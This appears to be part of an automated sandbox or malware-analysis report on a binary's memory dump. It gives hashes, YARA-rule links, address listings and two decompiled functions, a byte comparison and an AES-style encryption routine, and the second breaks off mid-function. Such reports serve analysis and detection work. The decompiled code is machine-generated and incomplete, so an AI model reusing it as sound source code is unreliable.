                                                                                                                0x00ed5af0
                                                                                                                0x00ed5af0
                                                                                                                0x00ed5af7
                                                                                                                0x00ed5af9
                                                                                                                0x00ed5b0d
                                                                                                                0x00ed5b0d
                                                                                                                0x00ed5b15
                                                                                                                0x00ed5b17
                                                                                                                0x00ed5b2b
                                                                                                                0x00ed5b2b
                                                                                                                0x00ed5b33
                                                                                                                0x00ed5b35
                                                                                                                0x00ed5b49
                                                                                                                0x00ed5b49
                                                                                                                0x00ed5b51
                                                                                                                0x00ed5b53
                                                                                                                0x00ed5b5c
                                                                                                                0x00ed5b5c
                                                                                                                0x00000000
                                                                                                                0x00ed5b53
                                                                                                                0x00ed5b3b
                                                                                                                0x00ed5b3e
                                                                                                                0x00ed5b47
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5b47
                                                                                                                0x00ed5b1d
                                                                                                                0x00ed5b20
                                                                                                                0x00ed5b29
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5b29
                                                                                                                0x00ed5aff
                                                                                                                0x00ed5b02
                                                                                                                0x00ed5b0b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5b0b
                                                                                                                0x00ed5ae0
                                                                                                                0x00ed5ae0
                                                                                                                0x00ed68d1

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                • Instruction ID: 6972b87b13eed7dcb11ae80847d62d6d9def627805af5973de2cfe3b0c795a4c
                                                                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                • Instruction Fuzzy Hash: 80C1553320596309DF2D4639847413FFBA1EAA17B631A276FD4B3DB2D4EE10C566D620
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED56D0, Relevance: .3, Instructions: 323COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ED56D0(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































                                                                                                                0x00ed56d0
                                                                                                                0x00ed56d0
                                                                                                                0x00ed56d0
                                                                                                                0x00ed56d6
                                                                                                                0x00ed575d
                                                                                                                0x00ed575f
                                                                                                                0x00ed5761
                                                                                                                0x00ed5ae0
                                                                                                                0x00ed5ae0
                                                                                                                0x00ed68d1
                                                                                                                0x00ed68d1
                                                                                                                0x00ed5767
                                                                                                                0x00ed576d
                                                                                                                0x00ed57f4
                                                                                                                0x00ed57f6
                                                                                                                0x00ed57f8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed57fe
                                                                                                                0x00ed5804
                                                                                                                0x00ed588b
                                                                                                                0x00ed588d
                                                                                                                0x00ed588f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5895
                                                                                                                0x00ed589b
                                                                                                                0x00ed5922
                                                                                                                0x00ed5924
                                                                                                                0x00ed5926
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5932
                                                                                                                0x00ed59ba
                                                                                                                0x00ed59bc
                                                                                                                0x00ed59be
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed59c4
                                                                                                                0x00ed59ca
                                                                                                                0x00ed5a51
                                                                                                                0x00ed5a53
                                                                                                                0x00ed5a55
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5a5b
                                                                                                                0x00ed5a61
                                                                                                                0x00ed5ad8
                                                                                                                0x00ed5ada
                                                                                                                0x00ed5adc
                                                                                                                0x00ed5ade
                                                                                                                0x00ed5ade
                                                                                                                0x00000000
                                                                                                                0x00ed5adc
                                                                                                                0x00ed5a6a
                                                                                                                0x00ed5a6c
                                                                                                                0x00ed5a80
                                                                                                                0x00ed5a88
                                                                                                                0x00ed5a8a
                                                                                                                0x00ed5a9e
                                                                                                                0x00ed5aa6
                                                                                                                0x00ed5aa8
                                                                                                                0x00ed5abc
                                                                                                                0x00ed5ac4
                                                                                                                0x00ed5ac6
                                                                                                                0x00ed5acf
                                                                                                                0x00ed5acf
                                                                                                                0x00000000
                                                                                                                0x00ed5ac6
                                                                                                                0x00ed5ab1
                                                                                                                0x00ed5aba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5aba
                                                                                                                0x00ed5a93
                                                                                                                0x00ed5a9c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5a9c
                                                                                                                0x00ed5a75
                                                                                                                0x00ed5a7e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5a7e
                                                                                                                0x00ed59d7
                                                                                                                0x00ed59d9
                                                                                                                0x00ed59f1
                                                                                                                0x00ed59f9
                                                                                                                0x00ed59fb
                                                                                                                0x00ed5a13
                                                                                                                0x00ed5a1b
                                                                                                                0x00ed5a1d
                                                                                                                0x00ed5a35
                                                                                                                0x00ed5a3d
                                                                                                                0x00ed5a3f
                                                                                                                0x00ed5a48
                                                                                                                0x00ed5a48
                                                                                                                0x00000000
                                                                                                                0x00ed5a3f
                                                                                                                0x00ed5a26
                                                                                                                0x00ed5a2f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5a2f
                                                                                                                0x00ed5a04
                                                                                                                0x00ed5a0d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5a0d
                                                                                                                0x00ed59e2
                                                                                                                0x00ed59eb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed59eb
                                                                                                                0x00ed5940
                                                                                                                0x00ed5942
                                                                                                                0x00ed595a
                                                                                                                0x00ed5962
                                                                                                                0x00ed5964
                                                                                                                0x00ed597c
                                                                                                                0x00ed5984
                                                                                                                0x00ed5986
                                                                                                                0x00ed599e
                                                                                                                0x00ed59a6
                                                                                                                0x00ed59a8
                                                                                                                0x00ed59b1
                                                                                                                0x00ed59b1
                                                                                                                0x00000000
                                                                                                                0x00ed59a8
                                                                                                                0x00ed598f
                                                                                                                0x00ed5998
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5998
                                                                                                                0x00ed596d
                                                                                                                0x00ed5976
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5976
                                                                                                                0x00ed594b
                                                                                                                0x00ed5954
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5954
                                                                                                                0x00ed58a8
                                                                                                                0x00ed58aa
                                                                                                                0x00ed58c2
                                                                                                                0x00ed58ca
                                                                                                                0x00ed58cc
                                                                                                                0x00ed58e4
                                                                                                                0x00ed58ec
                                                                                                                0x00ed58ee
                                                                                                                0x00ed5906
                                                                                                                0x00ed590e
                                                                                                                0x00ed5910
                                                                                                                0x00ed5919
                                                                                                                0x00ed5919
                                                                                                                0x00000000
                                                                                                                0x00ed5910
                                                                                                                0x00ed58f7
                                                                                                                0x00ed5900
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5900
                                                                                                                0x00ed58d5
                                                                                                                0x00ed58de
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed58de
                                                                                                                0x00ed58b3
                                                                                                                0x00ed58bc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed58bc
                                                                                                                0x00ed5811
                                                                                                                0x00ed5813
                                                                                                                0x00ed582b
                                                                                                                0x00ed5833
                                                                                                                0x00ed5835
                                                                                                                0x00ed584d
                                                                                                                0x00ed5855
                                                                                                                0x00ed5857
                                                                                                                0x00ed586f
                                                                                                                0x00ed5877
                                                                                                                0x00ed5879
                                                                                                                0x00ed5882
                                                                                                                0x00ed5882
                                                                                                                0x00000000
                                                                                                                0x00ed5879
                                                                                                                0x00ed5860
                                                                                                                0x00ed5869
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5869
                                                                                                                0x00ed583e
                                                                                                                0x00ed5847
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5847
                                                                                                                0x00ed581c
                                                                                                                0x00ed5825
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5825
                                                                                                                0x00ed577a
                                                                                                                0x00ed577c
                                                                                                                0x00ed5794
                                                                                                                0x00ed579c
                                                                                                                0x00ed579e
                                                                                                                0x00ed57b6
                                                                                                                0x00ed57be
                                                                                                                0x00ed57c0
                                                                                                                0x00ed57d8
                                                                                                                0x00ed57e0
                                                                                                                0x00ed57e2
                                                                                                                0x00ed57eb
                                                                                                                0x00ed57eb
                                                                                                                0x00000000
                                                                                                                0x00ed57e2
                                                                                                                0x00ed57c9
                                                                                                                0x00ed57d2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed57d2
                                                                                                                0x00ed57a7
                                                                                                                0x00ed57b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed57b0
                                                                                                                0x00ed5785
                                                                                                                0x00ed578e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed578e
                                                                                                                0x00ed56e3
                                                                                                                0x00ed56e5
                                                                                                                0x00ed56fd
                                                                                                                0x00ed5705
                                                                                                                0x00ed5707
                                                                                                                0x00ed571f
                                                                                                                0x00ed5727
                                                                                                                0x00ed5729
                                                                                                                0x00ed5741
                                                                                                                0x00ed5749
                                                                                                                0x00ed574b
                                                                                                                0x00ed5754
                                                                                                                0x00ed5754
                                                                                                                0x00000000
                                                                                                                0x00ed574b
                                                                                                                0x00ed5732
                                                                                                                0x00ed573b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed573b
                                                                                                                0x00ed5710
                                                                                                                0x00ed5719
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5719
                                                                                                                0x00ed56ee
                                                                                                                0x00ed56f7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                • Instruction ID: b6698a8650ae19663beb7d0b438c49ccd559c811f92d9c6e1af49548112bc953
                                                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                • Instruction Fuzzy Hash: 2FC1753320557349DF2D4639847403FBBA1EAA27B632A276FD4B3DB2C4EE20D526D610
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC4F0B, Relevance: .3, Instructions: 288COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EC4F0B(char* __ecx) {
				void* _t213;
				signed int _t217;
				signed int* _t221;
				signed int _t223;
				signed int _t225;
				signed int _t329;
				unsigned int _t331;
				signed int* _t333;
				signed char _t336;
				signed char _t337;
				signed int* _t339;
				signed int _t340;
				signed char _t360;
				signed char _t361;
				signed char _t362;
				signed int _t373;
				unsigned int _t375;
				signed char _t380;
				signed char _t381;
				unsigned int _t395;
				signed int* _t397;
				signed int _t399;
				char* _t401;
				unsigned int _t402;
				unsigned int _t403;
				signed int* _t404;
				void* _t405;

				_t402 =  *(_t405 + 0x44);
				_t401 = __ecx;
				if(_t402 != 0) {
					_t403 = _t402 >> 4;
					 *(_t405 + 0x48) = _t403;
					if( *__ecx == 0) {
						_t339 = __ecx + 8;
						 *(_t405 + 0x1c) = _t339;
						_t397 = _t339;
						if(_t403 == 0) {
							L14:
							 *_t339 =  *_t397;
							_t339[1] = _t397[1];
							_t339[2] = _t397[2];
							_t217 = _t397[3];
							_t339[3] = _t217;
							return _t217;
						}
						 *((intOrPtr*)(_t405 + 0xc)) =  *(_t405 + 0x50) + 4;
						_t221 =  *(_t405 + 0x48) + 8;
						 *(_t405 + 0x18) = _t221;
						do {
							if( *((char*)(_t401 + 1)) == 0) {
								_t329 =  *(_t221 - 8);
								_t399 =  *(_t221 - 4);
								_t373 =  *_t221;
								_t340 = _t221[1];
								 *(_t405 + 0x38) = _t329;
								 *(_t405 + 0x3c) = _t399;
								 *(_t405 + 0x40) = _t373;
								 *(_t405 + 0x44) = _t340;
							} else {
								E00EC4ED9(_t405 + 0x40, _t397,  &(_t221[0xfffffffffffffffe]));
								_t340 =  *(_t405 + 0x44);
								_t373 =  *(_t405 + 0x40);
								_t399 =  *(_t405 + 0x3c);
								_t329 =  *(_t405 + 0x38);
							}
							_t223 =  *(_t401 + 0x18) ^ _t329;
							 *(_t405 + 0x18) = _t223;
							_t331 =  *(_t401 + 0x20) ^ _t373;
							 *(_t405 + 0x28) = _t223;
							_t225 =  *(_t401 + 0x1c) ^ _t399;
							 *(_t405 + 0x14) = _t225;
							_t375 =  *(_t401 + 0x24) ^ _t340;
							 *(_t405 + 0x2c) = _t225;
							_t397 =  &(( *(_t405 + 0x10))[0xffffffffffffffff]);
							 *(_t405 + 0x20) = _t375;
							 *(_t405 + 0x34) = _t375;
							 *(_t405 + 0x30) = _t331;
							 *_t397 =  *(0xef8be0 + (_t375 >> 0x18) * 4) ^  *(0xef87e0 + (_t331 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xef83e0 + ( *(_t405 + 0x14) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xef7fe0 + ( *(_t405 + 0x18) & 0x000000ff) * 4);
							 *( *(_t405 + 0x10)) =  *(0xef87e0 + (_t375 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xef83e0 + (_t331 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xef8be0 + ( *(_t405 + 0x18) >> 0x18) * 4) ^  *(0xef7fe0 + ( *(_t405 + 0x14) & 0x000000ff) * 4);
							( *(_t405 + 0x10))[1] =  *(0xef83e0 + (_t375 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xef8be0 + ( *(_t405 + 0x14) >> 0x18) * 4) ^  *(0xef87e0 + ( *(_t405 + 0x18) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xef7fe0 + (_t331 & 0x000000ff) * 4);
							_t333 =  *(_t405 + 0x10);
							_t333[2] =  *(0xef8be0 + (_t331 >> 0x18) * 4) ^  *(0xef87e0 + ( *(_t405 + 0x14) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xef83e0 + ( *(_t405 + 0x18) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xef7fe0 + ( *(_t405 + 0x20) & 0x000000ff) * 4);
							 *(_t405 + 0x18) = 1;
							if( *(_t401 + 4) - 1 > 1) {
								_t363 = _t401 + 0x28;
								_t404 = _t333;
								 *(_t405 + 0x14) = _t401 + 0x28;
								do {
									E00EC4ED9(_t405 + 0x30, _t397, _t363);
									_t381 =  *(_t405 + 0x2c);
									_t336 =  *(_t405 + 0x30);
									 *_t397 =  *(0xef7fe0 + ( *(_t405 + 0x28) & 0x000000ff) * 4) ^  *(0xef83e0 + (_t381 & 0x000000ff) * 4) ^  *(0xef87e0 + ( *(_t405 + 0x32) & 0x000000ff) * 4) ^  *(0xef8be0 + ( *(_t405 + 0x37) & 0x000000ff) * 4);
									 *_t404 =  *(0xef8be0 + ( *(_t405 + 0x2b) & 0x000000ff) * 4) ^  *(0xef7fe0 + (_t381 & 0x000000ff) * 4) ^  *(0xef83e0 + (_t336 & 0x000000ff) * 4) ^  *(0xef87e0 + ( *(_t405 + 0x36) & 0x000000ff) * 4);
									_t337 =  *(_t405 + 0x34);
									_t404[1] =  *(0xef87e0 + ( *(_t405 + 0x2a) & 0x000000ff) * 4) ^  *(0xef8be0 + ( *(_t405 + 0x2f) & 0x000000ff) * 4) ^  *(0xef7fe0 + (_t336 & 0x000000ff) * 4) ^  *(0xef83e0 + (_t337 & 0x000000ff) * 4);
									_t363 =  *(_t405 + 0x14) + 0x10;
									 *(_t405 + 0x14) =  *(_t405 + 0x14) + 0x10;
									_t404[2] =  *(0xef83e0 + ( *(_t405 + 0x28) & 0x000000ff) * 4) ^  *(0xef87e0 + ( *(_t405 + 0x2e) & 0x000000ff) * 4) ^  *(0xef8be0 + ( *(_t405 + 0x33) & 0x000000ff) * 4) ^  *(0xef7fe0 + (_t337 & 0x000000ff) * 4);
									_t395 =  *(_t405 + 0x18) + 1;
									 *(_t405 + 0x18) = _t395;
								} while (_t395 <  *(_t401 + 4) - 1);
								_t403 =  *(_t405 + 0x50);
								_t333 =  *(_t405 + 0x10);
							}
							E00EC4ED9(_t405 + 0x30, _t397, ( *(_t401 + 4) << 4) + 8 + _t401);
							_t380 =  *(_t405 + 0x28);
							_t360 =  *(_t405 + 0x2c);
							 *_t397 =  *((intOrPtr*)(0xef7fe1 + (_t380 & 0x000000ff) * 4));
							 *((char*)(_t333 - 3)) =  *((intOrPtr*)(0xef7fe1 + (_t360 & 0x000000ff) * 4));
							 *((char*)(_t333 - 2)) =  *((intOrPtr*)(0xef7fe1 + ( *(_t405 + 0x32) & 0x000000ff) * 4));
							 *((char*)(_t333 - 1)) =  *((intOrPtr*)(0xef7fe1 + ( *(_t405 + 0x37) & 0x000000ff) * 4));
							_t361 =  *(_t405 + 0x30);
							 *_t333 =  *((intOrPtr*)(0xef7fe1 + (_t360 & 0x000000ff) * 4));
							_t333[0] =  *((intOrPtr*)(0xef7fe1 + (_t361 & 0x000000ff) * 4));
							_t333[0] =  *((intOrPtr*)(0xef7fe1 + ( *(_t405 + 0x36) & 0x000000ff) * 4));
							_t333[0] =  *((intOrPtr*)(0xef7fe1 + ( *(_t405 + 0x2b) & 0x000000ff) * 4));
							_t362 =  *(_t405 + 0x34);
							_t333[1] =  *((intOrPtr*)(0xef7fe1 + (_t361 & 0x000000ff) * 4));
							_t333[1] =  *((intOrPtr*)(0xef7fe1 + (_t362 & 0x000000ff) * 4));
							_t333[1] =  *((intOrPtr*)(0xef7fe1 + ( *(_t405 + 0x2a) & 0x000000ff) * 4));
							_t333[1] =  *((intOrPtr*)(0xef7fe1 + ( *(_t405 + 0x2f) & 0x000000ff) * 4));
							_t333[2] =  *((intOrPtr*)(0xef7fe1 + (_t362 & 0x000000ff) * 4));
							_t333[2] =  *((intOrPtr*)(0xef7fe1 + (_t380 & 0x000000ff) * 4));
							_t333[2] =  *((intOrPtr*)(0xef7fe1 + ( *(_t405 + 0x2e) & 0x000000ff) * 4));
							_t333[2] =  *((intOrPtr*)(0xef7fe1 + ( *(_t405 + 0x33) & 0x000000ff) * 4));
							E00EC4ED9(_t397, _t397, ( *(_t401 + 4) << 4) + 0x18 + _t401);
